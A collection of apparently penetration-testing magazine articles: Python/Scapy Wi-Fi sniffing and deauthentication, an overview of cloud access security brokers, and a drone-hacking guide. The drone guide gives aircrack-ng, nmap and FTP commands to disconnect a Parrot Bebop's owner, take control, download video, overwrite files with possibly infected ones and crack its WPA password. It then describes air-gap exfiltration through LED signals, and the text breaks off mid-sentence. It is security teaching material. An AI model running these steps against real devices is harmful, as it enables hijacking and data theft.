In this article, we will try to shed light on some of the Python advantages and functionality. We will divide the article
into two parts; the first part will discuss the practical use of Python to perform Wi-Fi attacks, the second part will use
Python to perform Exploit Development.

I will try to explain everything in detail. But to be honest, you should be aware of some things so that you do not miss
anything.

WHAT YOU NEED AND SHOULD KNOW:

● Basic Knowledge of 802.11 Protocol.

● Basic Knowledge of Wi-Fi Attacks.

● Basic Knowledge of Buffer Overflow Attacks.

● Python's Network Libraries.

WHAT YOU WILL LEARN:

● Perform Wi-Fi Sniffing With Python.

● Perform Wi-Fi Attacks With Python.

● Perform Exploit Development With Python.

Introduction:
With each passing day, the wireless connectivity community has grown, but it has also ushered in many security
issues. With wired connectivity, the attacker needs physical access in order to connect and attack, but in the case of
wireless connectivity, and attacker needs the availability of the signal to launch an attack. Before proceeding, you
should be aware of the terminology used:

Access Point (AP): It is a networking hardware device that allows a Wi-Fi compliant device to connect to a wired
network.

Service Set Identifier (SSID): It is a sequence of 0–32 alphanumeric characters. It is used as an identifier for a
wireless LAN, and is intended to be unique for a particular area. Since this identifier must often be entered into
devices manually by a human user, it is often a human-readable string and thus commonly called the "Network
Name".

Basic Service Set Identification (BSSID): It is the MAC address of the wireless AP.

Channel number: This represents the range of the radio frequency used by AP for transmission.

36
 Python - Practice And Functionality

Note: The channel number might get changed due to the auto setting of AP. So, don't get confused if
you saw the channel number getting changed.

802.11: Provides bandwidth up to 1-2 Mbps with a 2.4 GHz frequency band. All components of 802.11 are a set of
Media Access Control (MAC) and Physical Layer (PHY). The MAC Layer is the subclass of the Data Link Layer.

Frame: It is the Protocol Data Unit (PDU) of the Data Link Layer.

There are three main types of 802.11 Frames:

• Data Frame

• Control Frame

• Management Frame

These Frames are supported by The MAC Layer. The following figure represents the format of the MAC Layer:

(Figure 01). MAC Format

As you can see in the previous figure, there are three Addresses:

●Address 1: It's the MAC Address of the Client.

●Address2: It's the MAC Address of the AP.

●Address3: It's the MAC Address of the Source of Transmission.

In this article, we will focus on the "Management Frame". Now, let's see the transmitted frame between the Client and
AP:

(Figure 02). Transmitted Frames

In the previous figure, we can see the exchange of frames. Let's take a look at the subtypes of management frame:

Beacon: The AP (Access Point) periodically sends a beacon frame to announce its presence and relay information,
such as timestamp, SSID, etc.

Probe Request: The wireless device (client) sends out a probe request to determine which access points are within
range.
37
 Python - Practice And Functionality

Probe Response: In the response of the probe request, a station (AP) responds with a probe response frame,
containing capability information, supported data rates, etc.

Authentication Request: The client sends an authentication request frame containing its identity.

Authentication Response: The AP responds with either acceptance or rejection of the identity of the client.

Association Request: After successful authentication, the client sends an association request that contains its
characteristics, such as supported data rates and the SSID of the AP.

Association Response: AP sends an association response that contains acceptance or rejection. In the case of
acceptance, the AP will create an association ID for the client.

Reassociation Request: If a client roams away from the currently associated access point and finds another access
point having a stronger beacon signal, the radio NIC will send a reassociation frame to the new access point.

Reassociation Response: An access point sends a reassociation response frame containing an acceptance or
rejection notice to the radio NIC requesting reassociation.

Disassociation: A station sends a disassociation frame to another station if it wishes to terminate the association.

Deauthentication: A station sends a deauthentication frame to another station if it wishes to terminate secure
communications.

Now, it's time for the practical part. In the following part, we will discuss how to perform wireless attacks with Python.

We will use Kali as our OS to work with these attacks. If you are using Kali as your host on your physical computer or
laptop, you will have no problem performing these attacks. But, if you are using Kali as a Virtual Machine, you have to
get yourself a USB Wireless Adapter, because the Virtual Machine doesn't use the actual hardware of the Wireless
Adapter. You can't control the Wireless Adapter from the Virtual Machine.

Before performing any of these attacks, you need to enable monitor mode on your wireless interface with these
commands:

(Figure 03). Listing Interfaces

As you can see in the previous figure, we only have one wireless interface corresponding to "wlan0". Let's start by
enabling monitor mode on this interface:

38
 Python - Practice And Functionality

(Figure 04). Switching to Monitor Mode

Great. We successfully enabled monitor mode on the interface. We are ready now to write our first program that sniffs
SSID, BSSID and Channel of the AP.

Sniffing Beacon Frames:

(Figure 05). Sniffing Beacon Frames

We use the first line to instruct the program to use Python interpreter. Then, we imported Scapy Library and in the
next line we also imported Struct library. In the next line, we declared an empty list to store, which will store the MAC
Addresses of the APs. Then we made a new function named "info" which takes one argument called "fm". In the next
line, we make a condition to look for Dot11 Packets only. In line number 8, we can see that we made another condition
using number "0" for the type of the packet which refers to "Management Frame Packets", and number "8" for the
subtype of the packets which indicates "Beacon Frames". In the next line, we make a third condition to check for if the
MAC Address of the Beacon Frame Packet is already in the list or not. If the MAC Address doesn't exist in our list, we
append it to our list. Then, we continue by printing the information we extracted from the packet which indicates the
following:

fm.info: The SSID of the AP.

fm.addr2: The MAC Address (BSSID).

ord(fm[Dot11Elt:3].info): ord is a function used to convert text characters into its character code
representation. To understand what Dot11Elt is, you need to know that when the stations start talking with each other,
they also sent a wealth of additional information called Information Elements. Each one of the Information Elements
packets has an ID Number and every specific packet has its own meaning. What we are looking for is the Information
Element (Dott11Elt) packet with IDs Number "3", this packet is called Direct Spectrum (DSset), it contains the
Channel number that the AP uses to correspond. In the last line, we used built-in sniff function in Scapy, and assigned
it to our interface "wlan0", and we assigned our function called "info" to be applied on each packet we sniff.

Here is the result of the script:

39
 Python - Practice And Functionality

(Figure 06). Output of Sniffing Beacon Frames

Note: We are not doing anything bad here, we are capturing the signals that are already on air.

To understand what are we going to do next, you need to know the code of each subtype we are going to look for:

(Figure 7). Subtypes of Management Frames

There are two types of scans when dealing with Wireless APs. First, Passive Scan. In Passive Scanning, the WLAN
station moves to each channel as per channel list and waits for beacon frames. These frames are buffered and are used
to decode and extract information about BSSs.

40
 Python - Practice And Functionality

(Figure 08). Passive Scanning

This passive scanning will save battery power as it does not need to transmit. As shown in the previous figure, the
WLAN client receives beacon frames from three access points and hence it will declare that it has found only three
BSSs.

(Figure 09). Active Scanning

Second, Active Scan. In Active Scanning, stations plan an active role. Probe Request frames are used to obtain
responses from the network of choice. In Active Scanning, the station finds the network rather than waiting for the
network to announce its availability to all the stations.

We already know how to look for beacon frames and extract the information we need. Now, we are going to see how to
Sniff Probe Requests to extract information, like clients of the AP (the devices that use the AP to connect to internet).

41
 Python - Practice And Functionality

(Figure 10). Detecting Clients of AP

In line number 6, we make a new list to save the MAC address of the clients we find. In the next line, we ask the user to
enter the name of the AP, which will be stored in "ap_name" variable. In line number 9, we defined a new function
called "probesniff", which takes only one argument called "fm". In the next line, we make a condition looking only for
"Probe Requests" Packets. Then, we make a new variable and assign it to the name of the AP. In the next line, we make
another condition to check if the name of the AP is the same as the one that user entered. In line number 13, we make
a new condition to check if the Client MAC Address already exists in the list of clients or not. If it does not exist, we
print the name of AP, the MAC Address of the client we found, and then we append the new MAC address to the list of
clients we made earlier.

Now, let's see the output of our script:

(Figure 11). Output of Detecting Clients

Next, we will see how to perform active scanning trying to get the APs to respond to us without waiting for APs to send
"Beacon Frames" into the air.

As we mentioned before, in Active Scanning, we send a "Probe Request" Frame Packet to force the AP to respond to us
with "Probe Response" Frame Packet:

42
 Python - Practice And Functionality

(Figure 12). Sending Probe Requests

Let's look at the new things added in the preceding program. In line number 5, we imported a new library called "os",
this module provides a portable way of using operating system dependent functionality. In line number 8, we make a
new variable to store the broadcast receiver, assign it to the value "FF:FF:FF:FF:FF:FF", which will make the frames
addressed to every AP in our range. Then, we will assign "RandMAC()" to a new variable which will assign a random
MAC every time we use it. In line number 11, we define a new function called "channel_hopper", which will change
the range that we are transmitting on in a random range between "1 to 15". After that, we make a new function called
"ProbeSender". In line number 18, we make a new variable and assign it to the structure of Probe Request Frame,
which first we need to send a layer of RadioTap, then we put another layer of Dot11, and assign addr1 (Broadcast
Receiver) to "m=FF:FF:FF:FF:FF:FF" which, as I said before, will make our Frame addressed to every AP in our range,
then we assign addr2 (Source Address) to Random MAC which will assign a new MAC Address to the source address
in every frame we send, for addr3 (BSSID), we assign it to also Random MAC which will give another Random MAC
Address to the BSS ID. For the third part in our frame, we send a Probe Request layer. As I said before, every
management frame has to contain layers called Information Elements which we have to append to our Frame packet
as the fourth part. Last, but not least, we try to change our channel as well as sending the frame we made.

Then, we will use this code to sniff the responses of the APs:

43
 Python - Practice And Functionality

(Figure 13). Sniffing Probe Responses

There is nothing different about this code, the only difference is that we are looking for Probe Responses.

Now, let's see the output of our code:

(Figure 14). Output of Active Scanning

As you can see in the preceding figure, our code worked as expected. We forced the APs in our range to announce
themselves.

Where have you been?

In an attempt to provide seamless connectivity, your computer and phone often keep a preferred network list, which
contains the names of wireless networks you have successfully connected to in the past. Either when your computer
boots up or after disconnecting from a network, your computer frequently sends 802.11 Probe Requests to search for
each of the network names on that list.

In the next code, we will try to write a code that detects Probe Requests. Our code will print the network name, if the
request contains a new network name.

44
 Python - Practice And Functionality

(Figure 15). Detecting Preferred Networks

In the previous figure, we detect the Probe Requests that are in the air, and then we print the network name along with
the MAC address of the device (Station) that sent it.

Now, let's start up our script to see Probe Request from the computers or phones in our range:

(Figure 16). Revealing Preferred Networks

As you can see in the previous figure, our code worked as expected. We successfully extracted the Network Name, and
the MAC Address of the device it belongs to.

Is there a hidden network in our range?

According to IEEE 802.11 standards, every wireless network must have an identifier that's used by devices to connect
to that network. This is called the Service Set Identifier (SSID), it basically means "Network Name".

45
 Python - Practice And Functionality

As we mentioned earlier, every so often, routers broadcast something called a "Beacon Frame". This is nothing more
than a transmission that contains information about the network, including the SSID, and is meant to announce that
this network exists. This how your phone, for example, knows about all of the Wi-Fi networks around you. (Beacon
frames are broadcasted about once every 100 milliseconds.)

The Theory behind Hidden Networks:

Wireless signals are all the same: they start at a source (your router) and travel out in all directions. There's no way to
"aim" a Wi-Fi transmission in a straight line from your router to your computer, and even if you could, you wouldn't
be able to stop the signal as soon as it reached its intended recipient , it will keep going.

How do we find the Hidden Networks in our range?

Let's assume that your wireless network is NOT broadcasting its SSID. Nobody knows it exists except you. Does that
mean you are safe and nobody can find out the existence of your Wi-Fi Network? Actually, even if your network stops
broadcasting its SSID, other people can still find it by intercepting your transmissions to the router, and the router's
transmissions to you.

Now, let's write a code to intercept the Hidden Networks transmissions:

(Figure 17). Detecting Hidden Networks

There is only one difference between this code and our previous programs. In this code, we are looking for the "Beacon
Frames" that don't contain any SSID and then we print the MAC Address of that network.

Let's see the output of our code:

(Figure 18). Revealing Hidden Networks

As you can see, there is only one hidden network that I configured earlier.

How do you De-cloak Hidden Networks?

While the Hidden Networks leaves the info field blank during transmitting Beacon Frames, it does transmit the name

46
 Python - Practice And Functionality

during the Probe Responses. To discover the hidden name, we must wait for a Probe Response that matches the same
MAC Address that we discovered while looking for Hidden Networks in the previous figure.

Let's update our previous code to make it also sniff Probe Responses:

(Figure 19). Decloaking Hidden Networks

As you can see in the previous figure, we only updated our code to look for Probe Responses and filter it to compare
the MAC address of the frame with MAC address of the Hidden Network, and then print the Name of the Network as
you can see in the next figure:

(Figure 20). Revealing the Name of Hidden Networks

Up to this point, we have seen various sniffing techniques that gather information about the clients and APs around
us. Now, we will see how to perform wireless attacks.

Deauthentication Attack:

It's a type of denial of service attack that targets communication between a user and a Wi-Fi wireless access point.

How Does a Deauthentication Attack work?

The 802.11 (Wi-Fi) protocol contains a different type of frame, we have already seen some of it. We already defined
Deauthentication Frame, it's subtype of Management Frames, and the client uses it to declare that he wishes to
disconnect from AP. The AP also sends the deauthentication frame in the form of a reply. An attacker can send a
wireless access point a deauthentication frame at any time, on behalf of the client using the client's MAC Address,
which we already talked about how to get it.

It depends on what do you want to do. If you want to deauthenticate the whole AP's Clients you can use this code:

47
 Python - Practice And Functionality

(Figure 21). Deauthenticating the whole AP

On the other side, if you want to target a specific client, you can use this code:

(Figure 22). Deauthenticating Specific Target

It's very easy to understand this code. The frame variable contains the Deauthentication Packet. We used "sendp" to
send our packet, which contains the "count" referring to the total number of packets sent, "inter" which indicates the
interval between the packets we send.

Now, let's see the output of our code:

(Figure 23). Output of Deauthenticating Script

Detecting Deauthentication Attacks:

There is no counter measure to protect yourself from Deauthentication Attacks, but you can detect it with this code:

(Figure 24). Detecting Deauthentication Attacks

48
 Python - Practice And Functionality

(Figure 25). Output of Detecting Deauthentication Attacks Script

Conclusion:

We already talked about Scapy in the previous issue, but still I can't find the limit of this tool (library). I hope I
expanded your knowledge in Python and Scapy in this article and I also hope I meet you in another useful article.

About the Author

Omar Ahmed

Penetration Tester with 5 years of experience in web application

& Network Penetration Testing & Malware Analysis & Reverse

Engineering, Security Code auditing and incident response.

Conducted vulnerability assessment and penetration testing for

many high profile companies all over Middle East, Highly skilled

hands-on application security assessment and development of

security tools with deep understanding of vulnerability

management process and risk assessment. Involved in security challenges by joining online

CTFs.

https://www.linkedin.com/in/omar-ahmed-843b6b122

https://www.facebook.com/MistSpark

49
CASB - CLOUD ACCESS
SECURITY BROKER

by Samrat Das
 CASB - Cloud Access Security Broker

What is CASB?
This article aims to bring forward a concise knowledge for those people who are interested to learn about the latest
trend of Cloud Broker Security.

A Cloud Access Security Broker (CASB) is a set of new cloud security technologies that addresses the challenges posed
by the use of cloud apps and services. They work as tools that sit between an organization's on-premises infrastructure
and a cloud provider's infrastructure.

Playing the role of a gatekeeper, they allow the organization to extend the reach of their security policies beyond their
own infrastructure.

Classified as:

● On-premises or
● Cloud-hosted software that acts as a control point to support continuous visibility, compliance, threat
protection, and security for cloud services.

CASB solutions helps to:

● Identify and evaluate all the cloud apps in use

● Enforce cloud application management policies in web proxies or firewalls

● Provide handling of sensitive information

● Encrypt or tokenize sensitive content to enforce privacy and security

● Detect and block unusual account behaviour indicative of malicious activity

● Integrate cloud visibility and controls with broader security solutions for data loss prevention, access
management, and web security

Statistics:

● By 2020, 85% of large enterprises will use a cloud access security broker solution for their cloud services, which
is up from fewer than 5% in 2015.
● Through 2020, 95% of cloud security failures will be the customer's fault.
Source: (https://www.skyhighnetworks.com/cloud-security-university/what-is-cloud-access-security-broker/)

How does CASB come into market?

Enterprises are still struggling to understand the data security and compliance impact of aggressive employee and
organizational adoption of cloud applications while also trying to determine how to maintain data security and
compliance with new data residency laws as their infrastructure moves to the cloud.

This is where a Cloud Access Security Broker (CASB) comes into play. Since data residency means that sensitive data

51
 CASB - Cloud Access Security Broker

should never go outside the country, CASB provides cloud encryption with the option to have control over their own
encryption keys, so access to data without the enterprise’s knowledge is ruled out.

Though some cons include reduced application functionality due to lack of encrypted data processing by SaaS servers,
it is managed to a large extent by cyclic ciphers. On the road ahead, this is still a developing technology which will
bring out better measures in time.

How is CASB presented?

CASB technology is available as an SaaS application or on-premises via virtual or physical appliances, or both, using a
hybrid combination of on-premises and cloud-based policy enforcement points.

Observations:

● The wide adoption of identity and access management into the cloud, delivering cloud single sign-on, has
reduced the friction in adopting cloud services and related security controls, like cloud access security brokers
(CASBs).

● Many enterprise business units are acquiring cloud services directly without IT's involvement. This form of
"shadow IT" is fuelling growth in cloud service adoption as well as security risks.

● The CASB market has evolved rapidly since its gestation period in 2012 and includes a number of high-profile
acquisitions.

● Today, CASBs primarily address back-office applications delivered as SaaS.

How Does CASB Work?

A high level understanding:

CASBs work by ensuring that network traffic between on-premises devices and the cloud provider complies with the
organization's security policies.

52
 CASB - Cloud Access Security Broker

Image Source: Gartner’s blog: security musings

Fundamental Capabilities of CASB

● Cloud App Discovery and Analysis

Provide Shadow IT discovery and risk analysis including detailed cloud app ratings, usage analytics, and continuous
reporting.

● Data Governance and Protection

Provide the ability to enforce data-centric security policies to prevent unwanted activity such as inappropriate sharing
of content. Support encryption and tokenization of compliance-related data.

● Threat Protection and Incident Response

Prevent malicious activity such as data exfiltration due to account takeover, session hijacking, or insider activity
through continuous monitoring of user behavior. Identify and block malware being uploaded or shared within cloud
apps and provide tools for incident response.

● Compliance and Data Privacy

Assist with data residency and compliance with regulations and standards, as well as identify cloud usage and risks of
specific cloud services.

53
 CASB - Cloud Access Security Broker

CASB’s most prominent functionalities

● Visibility

CASBs provide both shadow and sanctioned IT discovery, as well as a consolidated view of an organization's
cloud service usage and the users who access data from any device or location.

● Compliance

CASBs assist with data residency and compliance with regulations and standards, as well as identify cloud usage
and the risks of specific cloud services.

● Data Security

CASBs provide the ability to enforce data-centric security policies to prevent unwanted activity based on data
classification, discovery and user activity monitoring of access to sensitive data or privilege escalation.

● Threat Protection

CASBs prevent unwanted devices, users and versions of applications from accessing cloud services by providing
adaptive access controls. Other examples in this category are user and entity behaviour analytics (UEBA) for
determining anomalous behaviour, the use of threat intelligence, and malware identification.

Comprehensive CASB solutions leverage the following:

● Application Specific Security

The top cloud apps have well-defined APIs that a CASB can leverage to monitor activity, analyse content, and
modify settings within accounts on that cloud app.

● Inline Security with Gateways

Sitting between the users and their cloud apps, a CASB gateway can provide valuable insights into cloud activity
and provide a vehicle for real-time policy enforcement, such as blocking data exfiltration or protecting
information with encryption.

● Shadow IT Analysis
Existing security devices, such as secure web gateways and firewalls, have log data that can be used to help
analyse Shadow IT.

● Access Control
Endpoint agents offer another option to manage cloud activity and enforce policies.

Architectural Choices (forward/reverse proxy/APIs)

Initially, the market was segregated between providers that delivered their CASB features via forward- and/or
reverse-proxy modes and others that used API modes exclusively.

Increasingly, a growing number of CASBs offer a choice between the proxy modes of operation and also support APIs

54
 CASB - Cloud Access Security Broker

(multimode CASBs).

● Reverse proxy

This can be deployed as a gateway on-premises or as the more popular method, as SaaS.

This is performed by changing the way authentication works by telling the cloud service that the CASB passes the
authentication onto the IDaaS provider, but, importantly, leaves the URL as belonging to the CASB and not the
cloud service.

IDaas is defined as IDentity-as-a-Service ("IDaaS").

This is a cloud-based service that provides a set of identity and access management functions to target systems on
customers' premises and/or in the cloud.

For people interested to learn more about IDaas, see:

(https://www.centrify.com/solutions/cloud/identity-as-a-service-idaas/)

This is one way to provide the ability to insert the CASB in front of end users accessing the SaaS service (with the
exception of mobile native apps using certificate pinning) without having to touch the endpoint's configuration.

It also allows for control over key management and application of cryptography solutions on-premises with no
access by a cloud-based CASB or cloud service provider. With hosted reverse proxy, there may be indirect access
to the key management system and keys/tokens being used in the cloud by the CASB and/or CSP.

● Forward proxy

This can be deployed as a cloud or on-premises, and some vendors may deploy software agents on endpoint
devices or pass profiles for enterprise mobile management (EMM) to enforce or use other methods like DNS and
proxy auto-configuration (PAC) files.

● API mode
This leverages the native features of the SaaS service itself by giving the CASB permission to access the service's
API directly.

This mode also allows organizations to perform a number of functions, like log telemetry, policy visibility and
control, and data security inspection functions on all data at rest in the cloud application or service.

The CASB may offer on-premises or hosted key management options.

API mode makes it possible to take advantage of both CASB-native, and a growing number of SaaS service data
protection. Features offered by the SaaS provider itself (for example, Salesforce Shield) perform
encryption/tokenization functions, but the end users still control the keys. However, the SaaS provider still has
access to the keys, and data is unencrypted while used by the application.

If the SaaS is hosted by another CSP's infrastructure (for example, Amazon or Microsoft), it is available in the
memory of the IaaS provider and may not meet strict data residency or compliance requirements.

Summarizing the above in a high-level table, we can deduce the following features with respect to functionality:

55
 CASB - Cloud Access Security Broker

Architectural Choices at a glance

Features Log Collection Forward Proxy Reverse Proxy API
Top-level usage statistics (which employees
•
use which services)
Risk assessment (risk profile of cloud
•
services in use)
Detect enforcement gaps (access of apps
•
not effectively blocked)
Collaboration analytics (sharing
•
permissions on files/folders)
Activity monitoring (audit trail of user and
• • •
admin actions)
Detect insider threats • • •
Detect compromised accounts •
Detect malware (exfiltrating data via
•
unsanctioned apps)
Detect malware (stored within sanctioned
•
apps)
DLP inspection (data at rest within
•
sanctioned apps)
DLP inspection (data in transit) •
DLP enforcement (quarantine, delete,
•
modify collaboration)

DLP enforcement (block, tombstone)

Security configuration audit (security

•
settings of apps)

Encrypt data (at rest in cloud apps) •

Encrypt data (in transit to the cloud) •

Decrypt data (for end-user access) •

Manage access (based on device, user,
•
location)
Policy-based authentication (require two
•
factors)
Apply rights management (to data on
•
download or upload)

Re-created table source:

https://www.skyhighnetworks.com/cloud-security-blog/new-ebook-which-casb-deployment-architecture-is-right-for-
me/

56
 CASB - Cloud Access Security Broker

Some use cases for CASB Implementation:

● Early anomaly detection: Leveraging data on the go can be used to detect anomalous behaviours and
potential.
● Reporting and auditing: CASB offers enhanced granular visibility with detailed activity logs and other
reports useful for compliance auditing and forensic purposes.
● DLP: Content validation by public cloud applications, blocking, watermarking, password protecting and
encryption will prevent data content from being exposed.
● Encryption: CASBs can encrypt objects pre-upload/post-download giving end-to-end data privacy and
regulatory compliance.

Leading choices for CASB:

➢ Microsoft (Adallom)
In September 2015, Microsoft completed its acquisition of Adallom, a CASB that had been shipping since early 2013.
This brought CASB to Microsoft's Enterprise Mobility + Security (EMS) suite and added new capabilities to Office 365.

➢ Imperva
Founded in November 2002 and has been shipping a CASB product since January 2014, when it acquired Skyfence.
Imperva focuses on providing detailed user activity monitoring, cloud DLP, access control and threat protection.

➢ Bitglass
Founded in January 2013 and has been shipping a CASB product since January 2014.

Bitglass integrates several mobile data management (MDM) and IAM capabilities into its offering, such as remote
wipe, single sign-on (SSO) and dual Security Assertion Markup Language (SAML) proxy, providing basic MDM and
IDaaS capabilities.

➢ Palo Alto Networks

Palo Alto Networks was founded in 2005 and has been shipping a CASB product since September 2015. In May 2015,
Palo Alto Networks acquired CirroSecure, an API-only based CASB provider more focused on discovery, SaaS policy
and security management for the product now called Aperture.

➢ CensorNet
Founded in February 2007 and has been shipping a CASB product since April 2015. CensorNet is one of the newer
entrants into the CASB market, and its CASB offering complements its existing email and web security products. It
also recently acquired a two-factor authentication company (SMS Passcode) to complement its product portfolio.

57
 CASB - Cloud Access Security Broker
➢ CipherCloud
Founded in October 2010 and has been shipping a CASB product since March 2011. CipherCloud was an early entrant
in the CASB market, with an initial focus on the encryption and tokenization of data in popular enterprise cloud
services, like Salesforce.

➢ Cisco CloudLock
Founded in January 2011 and has been shipping a CASB product since October 2013; it was acquired by Cisco in June
2016. It uses an API-only approach to the CASB market. It leverages APIs from cloud services (SaaS, PaaS, IaaS).

➢ FireLayers
Founded in November 2013 and has been shipping a CASB product since April 2014. FireLayers is a multimode CASB
delivering API, forward and reverse proxy, plus an SAML gateway. It provides cloud application discovery, but not
SaaS service security posture assessments. Instead, it focuses on threat protection, behavior analytics, contextual
access control and detailed activity monitoring.

➢ Netskope
Netskope was founded in October 2012 and has been shipping a CASB product since October 2013. It focused on user
behavior analytics, within managed and unmanaged SaaS applications, including extensive user activity monitoring
and DLP/DCAP capabilities.

➢ Palerra
Palerra was founded in July 2013 and has been shipping a CASB product since January 2015. In September 2016,
Oracle announced its intention to acquire Palerra. Palerra takes an API-based approach to CASB and covers SaaS,
PaaS and IaaS services.

➢ Skyhigh Networks
Skyhigh Networks was founded in December 2011 and has been shipping a CASB product since January 2013. Skyhigh
was one of the first CASB providers to emphasize the shadow IT problem with a large cloud service discovery database;
and cloud service security posture and risk assessment was an initial and still critical use case for CASB technology.

Further reading and references:

• https://www.bluecoat.com/products-and-solutions/casb-cloud-access-security-broker

• http://security-musings.blogspot.in/2015/04/comparing-cloud-access-security-broker.html

• http://www.bitglass.com/blog/cloud-access-security-brokers-post5

• https://www.ciphercloud.com/blog/casb-101-cloud-access-security-brokers/

58
 CASB - Cloud Access Security Broker

About the Author

Samrat Das

Samrat is a security researcher currently working for Deloitte India as a Security

Consultant. His research interests involve: Penetration Testing, Secure Coding,

Reverse Engineering & Malware Analysis. He can be reached on twitter:

@Samrat_Das93 or LinkedIn: https://in.linkedin.com/in/samrat18

59
NEW HACKING ERA:
WIRELESS HACKING BY
DRONES

by Carlos Manzo Trujillo

 New Hacking Era: Wireless Hacking By Drones

Drone Hack (Defensive)

The global market for commercial drones is projected to reach US$1.8 billion by 2020, driven by the expanding use of
unmanned aerial vehicles (UAVs) in executing high-risk tasks and the growing prominence of drones-as-a-service
(DaaS). Growing demand for superior aerial imagery, remote sensing, air surveillance, development of advanced
sensors, improvements on computing speed, and enhanced data processing capabilities, are driving the use of UAVs in
commercial applications. Technology maturity and falling prices of these systems are expanding market opportunities
into a wide range of commercial applications like:

● Precision agriculture
● Construction and Inspection
● Public safety and FRO (First Responder Operations)
● Mapping and Surveying

This is a guide on defense, specifically the Parrot Bebop Drone – once pulled out of the box, it has no encryption or
authentication methods, thus it leaves the drone susceptible to wireless hacking. Remember, if the drone is updated
then certain security functions may be changed.

In this guide, I will be disconnecting the original user from the drone. This can allow any other device to connect to the
drone and control it. Additionally, I will be connecting to the drone through Kali Linux, and downloading video
captured by the drone. Then, I will demonstrate how to upload files on top of drone files, before connecting over telnet
and forcing the drone to shut down and drop from the sky.

FreeFlight Pro now enables you to fly Parrot Bebop drones, Parrot Bebop 2 and Parrot Disco

We need to execute these commands:

root@kali: # airmon-ng start [interface]

61
 New Hacking Era: Wireless Hacking By Drones

root@kali: # airmon-ng check kill

root@kali: # airmon-ng check [interface]

Starts a capture file:

root@kali: # airodump-ng -c [#] --bssid [AP MAC] -w
[filelocation/name] [interface]

(note: -w in the previous command is optional as it is not necessary to write the capture to a file)

To deauthenticate the target permanently:

root@kali: # aireplay-ng -0 0 -a [AP MAC] [VIC MAC] [interface]

62
 New Hacking Era: Wireless Hacking By Drones

Now connect to your target with your phone to control the drone.

Original user:

Us:

Now I have the drone control. At this point, I can proceed with the FTP procedure. These steps are to get network
services backup, and are not required as long as you have not placed your card into monitor mode.
root@kali: # airmon-ng stop wlan1mon

root@kali: # service NetworkManager start

63
 New Hacking Era: Wireless Hacking By Drones

Connect the drone to your computer¹.

root@kali: # ifconfig (find

your IP)

¹ These steps can be accomplished through Windows machines too.

Nothing with netdiscover.
root@kali: # netdiscover

Now we are going to run a ping scan of devices 1-254. I am assuming only the subnet will change from person to
person. However, copy whatever IP address you got and make sure the last octect is 1-254. This should list all devices
connected to the drone. We are interested in the host ending in 1.
root@kali: # nmap -sn [X.X.X.1-254]

Now we run a scan on the target… and FTP is up! There is no more Telnet, there also seems to be a web page.
root@kali: # nmap [x.x.x.1]

64
 New Hacking Era: Wireless Hacking By Drones

Let’s connect to the FTP server.

root@kali: # ftp [IP]

“ls” to list files.

“cd” [directory name] to enter a file. As usual, I am going straight for the media file.

These are all videos or photos on the drone.

You can download them.

root@kali: # get [filename]

65
 New Hacking Era: Wireless Hacking By Drones

Alternatively, you could upload infected files, or download files, infect them and reload them to the drone. For the
purposes of this article, I will only overwrite the first file and wait for a response.
root@kali: # put [filename] [filetobeoverwritten]

Done, we now have a modified file and “probably” an infected file on the drone’s user.

Let us see how to hack a password protected drone. This is the network settings page for the drone, notice the simple
password.

For added security, users should also change the network name of their devices to avoid targeted attacks. OK, let’s do
it.
root@kali: # airmon-ng start wlan1

root@kali: # airmon-ng check kill

66
 New Hacking Era: Wireless Hacking By Drones

root@kali: # airodump-ng wlan1mon

root@kali: # airodump-ng –c 4 –-bssid A0:14:3D:BB:77:86 –w /

root/Desktop/DRONE wlan1mon

root@kali: # aireplay-ng -0 5 –a A0:14:3D:BB:77:86 –c

60:83:34:F5:55:12 wlan1mon

We wait for the password.

root@kali: # aircrack-ng –w /root/dictionaries/rockyou.txt /
root/Desktop/DRONE-01.cap

The password was found in three minutes. The only way to avoid this is to use complex passwords.

67
 New Hacking Era: Wireless Hacking By Drones

Drone Hack (Offensive)

A FEW HOURS after dark one evening earlier this month, a small quadcopter drone lifted off from the parking lot of
Ben-Gurion University in Beersheba, Israel. It soon trained its built-in camera on its target: a desktop computer’s tiny
blinking light inside a third-floor office nearby. The pinpoint flickers, emitting from the LED hard drive indicator that
lights up intermittently on practically every modern Windows machine, would hardly arouse the suspicions of anyone
working in the office after hours. But in fact, that LED was silently winking out an optical stream of the computer’s
secrets to the camera floating outside.

That data-stealing drone works as a Mr. Robot-style demonstration of a very real espionage technique. A group of
researchers at Ben-Gurion’s cybersecurity lab has devised a method to defeat the security protection known as an “air
gap,” the safeguard of separating highly sensitive computer systems from the internet to quarantine them from
hackers. If an attacker can plant malware on one of those systems—say, by paying an insider to infect it via USB or SD
card—this approach offers a new way to rapidly pull secrets out of that isolated machine. Every blink of its hard drive
LED indicator can spill sensitive information to any spy with a line of sight to the target computer, whether from a
drone outside the window or a telescopic lens from the next roof over.

An air gap, in computer security, is sometimes seen as an impenetrable defense. Hackers can’t compromise a
computer that’s not connected to the internet or other internet-connected machines, the logic goes. But malware like
Stuxnet and the Agent.btz worm that infected American military systems a decade ago have proven that air gaps can’t
entirely keep motivated hackers out of ultra-secret systems—even isolated systems need code updates and new data,
opening them to attackers with physical access. And once an air-gapped system is infected, researchers have
demonstrated a grab bag of methods for extracting information from them despite their lack of an internet connection,
from electromagnetic emanations to acoustic and heat signaling techniques—many developed by the same Ben-Gurion
researchers who generated the new LED-spying trick.

A drone is navigated to a line-of-sight with the infected computer. The transmitting computer is located. Malware
exfiltrate data via hard-drive LED signals.

An air-gapped computer:

● No internet
● No network
● No Wi-Fi / Bluetooth
● No speakers

Software (Malware):

● Transmitting data via electromagnetic signals

● Transmitting data via LED signals

A hard drive activity light is a small LED light that illuminates whenever the hard drive or other built-in storage is
being read from or written to.

68
 New Hacking Era: Wireless Hacking By Drones

A hard drive activity light is sometimes referred to as an HDD LED, a hard drive light, or a hard drive activity
indicator.

Hard Drive Light Keeps Flashing On and Off...

The goal of this article is not just to inform the curious, but also to provide a starting point for discussions about better
algorithms, improvement to the present algorithms, extension of the algorithms to non-machine-sent code, better
crypting and decrypting methods, etc.

Let us suppose the next scenario:

69
 New Hacking Era: Wireless Hacking By Drones

A drone is navigated to a line-of-sight with the infected computer. After the computer is located, malware exfiltrate
data via HD LED signals until we get 100% of our information target.

Air-gapped networks are isolated, separated both logically and physically from public networks, for example, military,
industrial and financial networks. Although the feasibility of invading such systems has been demonstrated in recent
years, communication of data to/from air-gapped networks is a challenging task to attackers to perpetrate, an even
